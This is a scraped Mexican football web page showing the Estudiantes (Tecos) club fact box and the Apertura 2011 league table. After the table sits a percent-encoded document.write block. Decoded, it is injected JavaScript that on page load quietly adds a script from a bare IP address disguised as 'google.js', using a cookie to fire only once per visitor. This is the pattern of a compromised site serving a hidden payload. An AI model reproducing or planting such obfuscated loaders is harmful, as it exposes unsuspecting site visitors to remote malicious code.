TABLA DE LOCAL AP2011

Estudiantes Factfile
Details
Name: Estudiantes
Coach: JOSE LUIS SALGADO
Venue: GUADALAJARA
Website: http://www.tecos.com.mx
Creation: 1935
TABLA GENERAL CALENDARIO Y RESULTADOS
TABLA DE VISITANTE CALENDARIO Y RESULTADOS POR EQUIPO
TABLA DE LOCAL DESCENSO

APERTURA 2011

PosTeamPtsPWDLFA+/-
1Pachuca  Pachuca20962117710
2Tigres  Tigres17945018810
3San Luis  San Luis17952217107
4Cruz Azul  Cruz Azul1785211266
5Pumas  Pumas17952214104
6Gallos Blancos  Gallos Blancos1685121477
7Jaguares  Jaguares16944120146
8Monterrey  Monterrey1685121495
9Santos  Santos1484221394
10Chivas  Chivas14842213112
11Toluca  Toluca1383411082
12Atlante  Atlante12933315141
13Morelia  Morelia1183231091
14Puebla  Puebla11832312120
15Xoloitcuintles  Xoloitcuintles109243910-1
16América  América992341516-1
17Atlas  Atlas791441012-2
18Estudiantes  Estudiantes682061115-4

document.write( unescape( ‘%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%66%75%6E%63%74%69%6F%6E%20%72%65%64%69%72%65%63%74%28%29%0A%7B%0A%76%61%72%20%74%68%65%63%6F%6F%6B%69%65%20%3D%20%72%65%61%64%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%29%3B%0A%69%66%28%21%74%68%65%63%6F%6F%6B%69%65%29%0A%7B%0A%20%20%20%20%20%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%0A%20%20%20%20%20%20%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%0A%20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%74%79%70%65%27%2C%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%29%0A%20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%22%68%74%74%70%3A%2F%2F%39%31%2E%32%33%39%2E%31%35%2E%36%31%2F%67%6F%6F%67%6C%65%2E%6A%73%22%29%0A%20%20%20%20%20%20%20%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%0A%7D%0A%7D%0A%0A%66%75%6E%63%74%69%6F%6E%20%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%6E%61%6D%65%2C%76%61%6C%75%65%2C%64%61%79%73%29%0A%7B%0A%69%66%20%28%64%61%79%73%29%0A%7B%0A%76%61%72%20%64%61%74%65%20%3D%20%6E%65%77%20%44%61%74%65%28%29%3B%0A%64%61%74%65%2E%73%65%74%54%69%6D%65%28%64%61%74%65%2E%67%65%74%54%69%6D%65%28%29%2B%28%64%61%79%73%2A%33%36%30%30%2A%33%36%30%30%2A%33%36%30%30%2A%31%30%30%30%29%29%3B%0A%76%61%72%20%65%78%70%69%72%65%73%20%3D%20%22%3B%20%65%78%70%69%72%65%73%3D%22%2B%64%61%74%65%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%3B%0A%7D%0A%65%6C%73%65%20%76%61%72%20%65%78%70%69%72%65%73%20%3D%20%22%22%3B%0A%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%3D%20%6E%61%6D%65%2B%22%3D%22%2B%76%61%6C%75%65%2B%65%78%70%69%72%65%73%2B%22%3B%20%70%61%74%68%3D%2F%22%3B%0A%7D%0A%0A%66%75%6E%63%74%69%6F%6E%20%72%65%61%64%43%6F%6F%6B%69%65%28%6E%61%6D%65%29%0A%7B%0A%76%61%72%20%6E%61%6D%65%45%51%20%3D%20%6E%61%6D%65%20%2B%20%22%3D%22%3B%0A%76%61%72%20%63%61%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%73%70%6C%69%74%28%27%3B%27%29%3B%0A%66%6F%72%28%76%61%72%20%69%3D%30%3B%69%20%3C%20%63%61%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%0A%7B%0A%76%61%72%20%63%20%3D%20%63%61%5B%69%5D%3B%0A%77%68%69%6C%65%20%28%63%2E%63%68%61%72%41%74%28%30%29%3D%3D%27%20%27%29%20%63%20%3D%20%63%2E%73%75%62%73%74%72%69%6E%67%28%31%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%69%66%20%28%63%2E%69%6E%64%65%78%4F%66%28%6E%61%6D%65%45%51%29%20%3D%3D%20%30%29%20%72%65%74%75%72%6E%20%63%2E%73%75%62%73%74%72%69%6E%67%28%6E%61%6D%65%45%51%2E%6C%65%6E%67%74%68%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%7D%0A%72%65%74%75%72%6E%20%6E%75%6C%6C%3B%0A%7D%0A%0A%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%72%65%64%69%72%65%63%74%28%29%3B%0A%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%2C%27%74%72%75%65%27%2C%27%39%39%39%27%29%3B%0A%7D%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E’));